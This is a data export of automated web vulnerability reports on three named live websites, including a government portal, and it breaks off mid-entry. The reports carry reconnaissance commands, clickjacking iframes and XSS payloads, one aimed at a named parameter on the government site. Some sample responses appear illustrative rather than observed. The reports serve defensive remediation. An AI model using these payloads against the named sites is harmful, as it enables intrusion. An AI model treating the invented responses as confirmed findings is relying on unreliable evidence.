[{"_id":{"$oid":"6a0d64865bbc057e6099d075"},"created_at":{"$date":"2026-05-20T07:36:38.928Z"},"url":"https://pro.anveshaktool.in/","tool":"generate_web_vulnerability_report","result":{"url":"https://pro.anveshaktool.in/","category":"web_vulnerability","timestamp":"2026-05-20T07:36:38.922194+00:00","report":"### [Multiple IPs Found / https://pro.anveshaktool.in/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThis informational finding indicates that multiple IP addresses were identified for the domain `pro.anveshaktool.in`. These include IPv4 and IPv6 addresses associated with Cloudflare's infrastructure (e.g., 104.21.23.154, 172.67.211.177). This behavior is typical when a website is fronted by a CDN or reverse proxy such as Cloudflare, which distributes traffic across geographically dispersed edge nodes.\n\nWhile not inherently a vulnerability, identifying multiple IPs can assist attackers in mapping network topology, detecting backend configurations, or attempting to bypass WAF protections by targeting less protected origins directly.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to discover all A/AAAA records:\n\n```bash\n$ dig pro.anveshaktool.in A AAAA +short\n104.21.23.154\n172.67.211.177\n2606:4700:3030::6815:179a\n2606:4700:3031::ac43:d3b1\n```\n\nThey might then attempt direct access to these IPs to check whether they bypass Cloudflare’s protection layer. If successful, they could potentially exploit vulnerabilities on the origin server without going through the CDN’s filtering mechanisms.\n\n**Business Impact**  \nAlthough this does not pose immediate risk, it provides reconnaissance value to adversaries who may uncover misconfigured internal systems or unprotected endpoints behind public-facing services.\n\n**Remediation**  \nEnsure that origin servers are configured to reject requests not routed through the CDN/WAF:\n- Restrict access at the firewall level to allow only trusted CDN ranges.\n- Implement proper host header validation on the origin server.\n- Regularly audit DNS entries and remove unnecessary mappings.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThe HTTP Strict Transport Security (HSTS) header is missing from responses sent by the application. The HSTS header instructs browsers to enforce secure communication over HTTPS for future visits to the site, preventing downgrade attacks and cookie hijacking over unencrypted channels.\n\nWithout this header, users remain vulnerable to man-in-the-middle attacks during their initial visit or after clearing browser state.\n\n**Attack Scenario (Proof of Concept)**  \nIf an attacker performs a MITM attack and intercepts the first connection attempt to `http://pro.anveshaktool.in`, they can redirect the user to a malicious clone of the site before the browser upgrades to HTTPS. Example interception flow:\n\n1. User types `anveshaktool.in`.\n2. Browser attempts HTTP request.\n3. Attacker responds with fake login page.\n4. Credentials stolen.\n\nAlternatively, if cookies lack the `Secure` flag, session tokens could be transmitted over plaintext HTTP if the user manually navigates to HTTP URLs.\n\n**Business Impact**  \nPotential exposure of sensitive credentials and sessions due to insecure transport protocols. Could lead to phishing success rates increasing and compromise of authenticated accounts.\n\n**Remediation**  \nAdd the following header to all HTTPS responses:\n\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\n\nOr in NGINX:\n\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\" always;\n```\n\nAlso consider submitting your domain to the HSTS preload list maintained by Google.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-http-strict-transport-security-hsts)\n\nCWE: CWE-319  \nRFC: RFC 6797  \n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/sitemap.xml / https://pro.anveshaktool.in/sitemap.xml]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/sitemap.xml |\n\n**Description**  \nSame as previous entry but applies specifically to `/sitemap.xml`. Lack of HSTS here means even static assets served under HTTPS are susceptible to downgrade attacks unless globally enforced.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker could manipulate sitemap delivery to inject links pointing to non-TLS versions of pages, tricking crawlers into indexing insecure paths.\n\nExample intercepted response modification:\n\n```xml\n<url>\n  <loc>http://pro.anveshaktool.in/login</loc>\n</url>\n```\n\nThis increases chances of exposing login forms or other sensitive interfaces over HTTP.\n\n**Business Impact**  \nRisk of search engines indexing insecure versions of critical pages, leading to increased attack surface and potential credential theft.\n\n**Remediation**  \nApply global HSTS headers as described previously. Ensure consistent enforcement across all sub-resources including XML documents.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nMissing HSTS on `robots.txt` allows attackers to tamper with crawler instructions over HTTP, potentially hiding malicious directories or exposing unintended ones.\n\n**Attack Scenario (Proof of Concept)**  \nIntercepting and modifying `robots.txt` delivered over HTTP:\n\nOriginal:\n```\nUser-agent: *\nDisallow: /admin/\n```\n\nModified:\n```\nUser-agent: *\nAllow: /\n```\n\nThis could cause automated scanners to index restricted areas or miss important hidden paths.\n\n**Business Impact**  \nMisleading SEO bots and increasing visibility of sensitive directories. Also opens up possibilities for stealthier reconnaissance.\n\n**Remediation**  \nEnforce HSTS globally as outlined earlier. Additionally, serve `robots.txt` exclusively over HTTPS and validate its integrity regularly.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe absence of the `X-Content-Type-Options: nosniff` header leaves older browsers open to MIME-type confusion attacks. In such cases, a file intended to be parsed as text/plain may instead be interpreted as executable JavaScript or HTML depending on byte patterns detected by the browser.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a `.txt` file containing embedded script tags:\n\n```html\n<script>alert(1)</script>\n```\n\nIf served without correct Content-Type and lacking `nosniff`, some browsers may execute the payload as JavaScript.\n\nRequest:\n```http\nGET /uploads/malicious.txt HTTP/1.1\nHost: pro.anveshaktool.in\n```\n\nResponse lacks both `Content-Type` and `X-Content-Type-Options`.\n\nBrowser interprets content based on sniffing logic → XSS triggered.\n\n**Business Impact**  \nPossible cross-site scripting (XSS) exploitation via MIME-type confusion, especially concerning legacy clients or misconfigured upload handlers.\n\n**Remediation**  \nSet the following header in all HTTP responses:\n\nApache:\n```apache\nHeader always set X-Content-Type-Options \"nosniff\"\n```\n\nNGINX:\n```nginx\nadd_header X-Content-Type-Options \"nosniff\" always;\n```\n\nEnsure accurate `Content-Type` headers accompany each resource.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-x-content-type-options)\n\nCWE: CWE-116\n\n---\n\n### [HTTPS Content Available via HTTP / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nResources originally accessed securely over HTTPS are also available over plain HTTP. This undermines confidentiality guarantees and exposes data to eavesdropping or manipulation en route.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing `http://pro.anveshaktool.in/robots.txt` reveals same content as HTTPS version:\n\n```bash\ncurl http://pro.anveshaktool.in/robots.txt\n```\n\nSensitive directives within `robots.txt` become visible to passive observers on shared networks or compromised proxies.\n\n**Business Impact**  \nExposure of potentially sensitive information about disallowed paths, weakening overall defense posture against automated scanning tools.\n\n**Remediation**  \nRedirect all HTTP traffic to HTTPS permanently using 301 redirects:\n\nApache:\n```apache\nRewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]\n```\n\nNGINX:\n```nginx\nserver {\n    listen 80;\n    return 301 https://$host$request_uri;\n}\n```\n\nAdditionally, configure HSTS to prevent future regressions.\n\n---\n\n### [Re-examine Cache-control Directives / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe `Cache-Control` header is either absent or improperly configured, allowing caching of responses by intermediate proxies or browsers. While acceptable for static assets, improper caching of dynamic or sensitive content poses risks.\n\n**Attack Scenario (Proof of Concept)**  \nIf `robots.txt` contains time-sensitive exclusions and gets cached indefinitely:\n\n```http\nCache-Control: max-age=31536000\n```\n\nThen changes made to exclude new admin panels won’t propagate immediately, leaving them indexed temporarily.\n\n**Business Impact**  \nDelayed propagation of updated security policies; possible leakage of temporary secrets or private routes.\n\n**Remediation**  \nImplement granular cache control strategies:\n\nFor sensitive files:\n```http\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nExpires: 0\n```\n\nFor static assets:\n```http\nCache-Control: public, max-age=31536000\n```\n\nReview all endpoints and tailor caching rules accordingly.\n\n---\n\n### [Clickjacking Protection / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThe `X-Frame-Options` header is not present, making the application susceptible to clickjacking attacks. An attacker could embed the page inside an invisible iframe and trick users into performing unintended actions (e.g., clicking buttons, submitting forms).\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious webpage embedding the target app:\n\n```html\n<iframe src=\"https://pro.anveshaktool.in/\" width=\"100%\" height=\"100%\" style=\"opacity: 0;\"></iframe>\n<button onclick=\"document.querySelector('iframe').contentWindow.postMessage(...)\" style=\"position:absolute;top:200px;left:300px;\">Click Me!</button>\n```\n\nVictim clicks button believing it belongs to the attacker’s site, unknowingly interacting with framed content.\n\n**Business Impact**  \nUnauthorized actions performed on behalf of logged-in users, including form submissions, deletions, or privilege escalations.\n\n**Remediation**  \nAdd the following header to all responses:\n\nApache:\n```apache\nHeader always set X-Frame-Options \"DENY\"\n# Or \"SAMEORIGIN\" if framing needed internally\n```\n\nNGINX:\n```nginx\nadd_header X-Frame-Options \"DENY\" always;\n```\n\nConsider implementing Content Security Policy (`frame-ancestors`) for more modern protection.\n\nReference: [OWASP Clickjacking Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)\n\nCWE: CWE-451\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nDuplicate of prior HSTS findings. No additional context provided beyond what already covered.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous HSTS-related sections.\n\n**Business Impact**  \nSee previous HSTS-related sections.\n\n**Remediation**  \nSee previous HSTS-related sections.\n\n---\n\n### [MIME Type Confusion / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nSame root cause as earlier X-Content-Type-Options issue. Absence of `nosniff` directive enables MIME-sniffing-based attacks.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous X-Content-Type-Options section.\n\n**Business Impact**  \nSee previous X-Content-Type-Options section.\n\n**Remediation**  \nSee previous X-Content-Type-Options section.","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a0e864d0759bb65a6ed1f87"},"created_at":{"$date":"2026-05-21T04:13:01.045Z"},"url":"https://springs.com.pk","tool":"generate_web_vulnerability_report","result":{"url":"https://springs.com.pk","category":"web_vulnerability","timestamp":"2026-05-21T04:13:01.038209+00:00","report":"### [Multiple IPs Found / springs.com.pk / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk |\n\n**Description**  \nThe Nikto scan identified that the domain `springs.com.pk` resolves to multiple IP addresses: one IPv4 (`208.91.112.55`) and one IPv6 (`2001:cdba::3257:9652`). This is typically normal behavior for dual-stack environments but can also indicate potential misconfigurations or inconsistencies in load balancing, CDN setup, or DNS round-robin configurations.\n\nAn attacker may use this information during reconnaissance to map out infrastructure redundancy, identify backend systems, or attempt targeted attacks against less secure endpoints.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker performs a DNS lookup using `dig` or `nslookup`:  \n   ```bash\n   dig A springs.com.pk\n   dig AAAA springs.com.pk\n   ```\n2. Observes both IPv4 and IPv6 records returned.\n3. Probes each endpoint individually via HTTP(S) requests to determine differences in response headers, content, or security posture:\n   ```bash\n   curl -I http://[2001:cdba::3257:9652]/\n   curl -I http://208.91.112.55/\n   ```\n\nThis could reveal inconsistent configurations across different servers or expose legacy services on older stacks.\n\n**Business Impact**  \nWhile not directly exploitable, exposure of multiple IPs increases the attack surface by revealing additional network entry points. It may assist attackers in identifying outdated or misconfigured hosts which might lack current patches or hardened configurations.\n\n**Remediation**  \nEnsure all exposed IP addresses are intentionally configured and uniformly secured:\n- Audit DNS records to confirm only necessary IPs are published.\n- Ensure consistent application-level and server-level hardening across all resolved endpoints.\n- Implement centralized logging and monitoring for traffic anomalies from these IPs.\n- Where applicable, restrict access at the firewall level if certain IPs should not be publicly accessible.\n\n---\n\n### [Missing Content Security Policy / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe website does not implement a Content Security Policy (CSP), leaving it vulnerable to Cross-Site Scripting (XSS) exploitation. CSP provides an added layer of protection by allowing website owners to define trusted sources of content and restrict inline scripts or object execution.\n\nWithout CSP, even minor XSS flaws become more dangerous as they allow arbitrary script injection without mitigation mechanisms such as nonce-based restrictions or strict-src directives.\n\n**Attack Scenario (Proof of Concept)**  \nIf an XSS vulnerability exists elsewhere on the site, an attacker could inject malicious JavaScript like:\n```html\n<script>alert(document.cookie)</script>\n```\nBecause no CSP header blocks inline execution, the browser executes the payload, potentially stealing session cookies or performing actions under user context.\n\nExample request showing missing CSP:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nResponse Headers:\nServer: Apache\nContent-Type: text/html; charset=UTF-8\n...\n(No Content-Security-Policy header present)\n```\n\n**Business Impact**  \nLack of CSP increases risk of successful XSS exploitation, leading to account compromise, phishing, credential theft, or defacement. In regulated industries, this may lead to compliance violations related to data integrity and confidentiality.\n\n**Remediation**  \nImplement a strong CSP policy via HTTP response headers:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none';\"\n```\nOr dynamically within HTML `<meta>` tags:\n```html\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'self';\">\n```\nAvoid `'unsafe-inline'` unless absolutely required. Use nonces or hashes when needed.\n\nReference: [OWASP CSP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html), CWE-1021\n\n---\n\n### [Missing X-Frame-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header is absent from responses, making the site susceptible to clickjacking attacks. Clickjacking occurs when a malicious page overlays transparent elements over legitimate UI components, tricking users into clicking unintended actions.\n\nProperly setting `X-Frame-Options` prevents framing by third-party sites, mitigating such risks.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates an HTML page embedding the target in an iframe:\n```html\n<iframe src=\"https://springs.com.pk/\" width=\"800\" height=\"600\"></iframe>\n<style>iframe { opacity: 0; }</style>\n<div style=\"position:absolute;top:200px;left:300px;\">Click here to win!</div>\n```\nVictim clicks what appears to be a harmless link, but actually interacts with hidden buttons inside the framed page—e.g., submitting forms or authorizing transactions unknowingly.\n\n**Business Impact**  \nPotential unauthorized actions taken on behalf of authenticated users, including financial transfers, profile changes, or deletion of resources. Reputational harm due to perceived lack of basic security controls.\n\n**Remediation**  \nAdd the following HTTP response header:\n```apache\nHeader always append X-Frame-Options SAMEORIGIN\n```\nAlternatively, use modern alternatives like `frame-ancestors` directive in CSP:\n```http\nContent-Security-Policy: frame-ancestors 'self';\n```\n\nReference: [OWASP Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html), CWE-451\n\n---\n\n### [Missing HSTS Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nHTTP Strict Transport Security (HSTS) is not enforced, meaning browsers may still connect over unencrypted HTTP initially before being redirected to HTTPS. An active man-in-the-middle (MITM) attacker could intercept initial plaintext requests and prevent redirection to HTTPS, exposing sensitive data.\n\nEnabling HSTS ensures that future connections automatically upgrade to HTTPS, reducing MITM risks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Victim types `springs.com.pk` in their browser.\n2. Initial connection made over HTTP (if cached DNS resolves to HTTP first).\n3. Attacker intercepts request and serves fake login form instead of redirecting to HTTPS version.\n4. User submits credentials over insecure channel.\n\nExample response lacks HSTS:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nServer: Apache\nLocation: https://springs.com.pk/\n...\n(No Strict-Transport-Security header)\n```\n\n**Business Impact**  \nRisk of session hijacking, credential interception, and downgrade attacks. Especially critical for authentication flows or e-commerce functionality.\n\n**Remediation**  \nSet the HSTS header with sufficient max-age and includeSubDomains/preload flags:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS certificate is valid and properly configured prior to enabling HSTS.\n\nReference: [RFC 6797](https://tools.ietf.org/html/rfc6797), OWASP Transport Layer Protection Cheat Sheet, CWE-319\n\n---\n\n### [Missing X-Content-Type-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Content-Type-Options` header is missing, increasing susceptibility to MIME type sniffing attacks. Browsers sometimes guess file types based on content rather than declared MIME types, which can result in executable files being interpreted as HTML or scripts.\n\nSetting `X-Content-Type-Options: nosniff` instructs browsers to strictly adhere to declared MIME types, preventing such misinterpretation.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a file named `image.jpg`, but its contents are actually HTML with embedded JavaScript:\n```html\n<script>alert('Sniffed!');</script>\n```\nIf served with incorrect MIME type (`text/plain`) but browser sniffs it as HTML, the script will execute.\n\nExample response shows absence:\n```http\nGET /upload/image.jpg HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nContent-Type: text/plain\n...\n(No X-Content-Type-Options header)\n```\n\n**Business Impact**  \nIncreased likelihood of XSS and other client-side code injection vulnerabilities. Can facilitate bypass of input validation and content filtering systems.\n\n**Remediation**  \nInclude the following HTTP response header globally:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nApply especially to dynamic content, uploaded files, and API responses.\n\nReference: [MDN Web Docs – X-Content-Type-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options), CWE-16\n\n---","summary":{"total":5}},"summary":{"total":5}},{"_id":{"$oid":"6a0fac7f3baacd71f234d7f0"},"created_at":{"$date":"2026-05-22T01:08:15.284Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-22T01:08:15.278179+00:00","report":"### [Nikto Scan Completed / https://ep.gov.pk/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis entry indicates that a Nikto scan was performed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items including over 6700 potentially dangerous files/CGIs, outdated server versions, and various server configuration issues. This log does not indicate any specific vulnerability but rather confirms that a scan occurred.\n\n**Attack Scenario (Proof of Concept)**  \nAs this is merely a logging event indicating completion of a scan tool, there is no direct exploitation path. However, attackers may use tools like Nikto during reconnaissance phases to enumerate known vulnerabilities or misconfigurations on web servers.\n\nExample usage:\n```bash\nnikto -h https://ep.gov.pk/\n```\n\n**Business Impact**  \nWhile this finding itself has no impact, its presence suggests that automated scanning activity has taken place, possibly by threat actors or internal security teams. It highlights the importance of monitoring such activities and ensuring systems are hardened against common exposures.\n\n**Remediation**  \nThere is no remediation required for this informational finding. Ensure regular patching and hardening practices are followed to reduce exposure to findings identified by scanners like Nikto.\n\n---\n\n### [Content Security Policy Configuration / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nA Content Security Policy (CSP) header defines approved sources of content that the browser may load. Its absence allows potential execution of malicious scripts from unauthorized domains, increasing risk of XSS attacks. The lack of CSP leaves the application vulnerable to inline script injections and other client-side threats.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker could inject arbitrary JavaScript into pages lacking CSP enforcement:\n\nRequest:\n```http\nGET / HTTP/1.1\nHost: ep.gov.pk\n```\n\nResponse lacks `Content-Security-Policy` header:\n```http\nHTTP/1.1 200 OK\nServer: Apache\n...\n```\n\nPayload Example:\n```html\n<script>alert('XSS')</script>\n```\n\nIf reflected without sanitization, this can execute in user browsers.\n\n**Business Impact**  \nWithout CSP, the site becomes more susceptible to cross-site scripting (XSS), clickjacking, and data leakage risks. These can lead to compromised sessions, defacement, or phishing attacks targeting users.\n\n**Remediation**  \nImplement a strong CSP policy via HTTP response headers. Example:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none'\"\n```\nReference: [OWASP CSP](https://owasp.org/www-community/controls/Content_Security_Policy), CWE-1021\n\n---\n\n### [Clickjacking Protection / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header prevents rendering of the page within frames, protecting against clickjacking attacks. Without it, attackers can embed the page inside an iframe and trick users into performing unintended actions.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious HTML page embedding the target:\n```html\n<iframe src=\"https://ep.gov.pk/\" width=\"100%\" height=\"100%\"></iframe>\n```\nBy overlaying transparent elements, they manipulate clicks leading to unintended behavior.\n\n**Business Impact**  \nUsers might unknowingly perform sensitive actions (e.g., submitting forms, changing settings) under attacker control, resulting in account compromise or fraudulent transactions.\n\n**Remediation**  \nAdd the following header to all responses:\n```apache\nHeader always set X-Frame-Options DENY\n```\nOr allow only trusted origins:\n```apache\nHeader always set X-Frame-Options SAMEORIGIN\n```\nReference: [OWASP Clickjacking](https://owasp.org/www-community/attacks/Clickjacking), CWE-1021\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nMissing HSTS (`Strict-Transport-Security`) header means the website doesn't enforce encrypted communication. Attackers can exploit man-in-the-middle scenarios using protocol downgrade attacks to intercept traffic.\n\n**Attack Scenario (Proof of Concept)**  \nUser accesses `http://ep.gov.pk`, gets redirected to HTTPS. An attacker intercepts initial HTTP request and redirects to a fake login portal.\n\n**Business Impact**  \nRisk of credential theft, session hijacking, and eavesdropping due to insecure connections being accepted.\n\n**Remediation**  \nSet the HSTS header with appropriate directives:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS is properly configured before enabling HSTS.  \nReference: [OWASP HSTS](https://owasp.org/www-project-cheat-sheets/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html), CWE-319\n\n---\n\n### [MIME Type Confusion / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nAbsence of the `X-Content-Type-Options: nosniff` header allows browsers to guess MIME types based on file contents. This can result in executable content being interpreted as benign, facilitating XSS or drive-by downloads.\n\n**Attack Scenario (Proof of Concept)**  \nUpload a `.jpg` file containing JavaScript. If served without proper MIME type and missing `nosniff`, browser executes it as JS.\n\n**Business Impact**  \nPotential for XSS, malware delivery, and bypassing content-type restrictions.\n\n**Remediation**  \nEnforce correct MIME handling:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nAlso ensure accurate server-side MIME declarations.  \nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#x-content-type-options), CWE-16\n\n---\n\n### [Inconsistent Redirection / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nWhen issuing a redirect (HTTP 3xx status), the server includes unexpected HTML content such as links or forms. This violates best practice and increases risk of phishing or manipulation.\n\n**Attack Scenario (Proof of Concept)**  \nPOST request triggers redirect with embedded form:\n```http\nPOST /ep_Complaint/Default_Test.aspx HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n...\n\ntxt_ArticleNo=<malicious_input>\n\nHTTP/1.1 302 Found\nLocation: /error.html\n\n<html><body><form action=\"/phish\" method=\"post\">...</form></body></html>\n```\n\n**Business Impact**  \nRedirects with unexpected content can facilitate phishing attempts or confuse clients relying on standard HTTP semantics.\n\n**Remediation**  \nEnsure 3xx responses contain minimal/no body content. Remove unnecessary HTML from redirect responses.  \nReference: [RFC 7231 Section 6.4](https://tools.ietf.org/html/rfc7231#section-6.4)\n\n---\n\n### [Reflected XSS via textfieldz / https://ep.gov.pk/track.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/track.asp |\n\n**Description**  \nInput from the `textfieldz` parameter is directly echoed back in the response without sanitization, allowing execution of arbitrary scripts when rendered in the victim's browser.\n\n**Attack Scenario (Proof of Concept)**  \nSubmit payload via POST:\n```http\nPOST /track.asp HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\ntextfieldz=<script>alert(document.cookie)</script>\n```\n\nResponse reflects unsanitized input:\n```html\n<p>You searched for: <script>alert(document.cookie)</script></p>\n```\n\n**Business Impact**  \nSession hijacking, credential theft, and social engineering attacks possible through crafted URLs.\n\n**Remediation**  \nSanitize and encode output contextually:\n```asp\nResponse.Write Server.HTMLEncode(Request.Form(\"textfieldz\"))\n```\nUse frameworks with auto-escaping features.  \nReference: [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet), CWE-79\n\n---\n\n### [Reflected XSS via n / 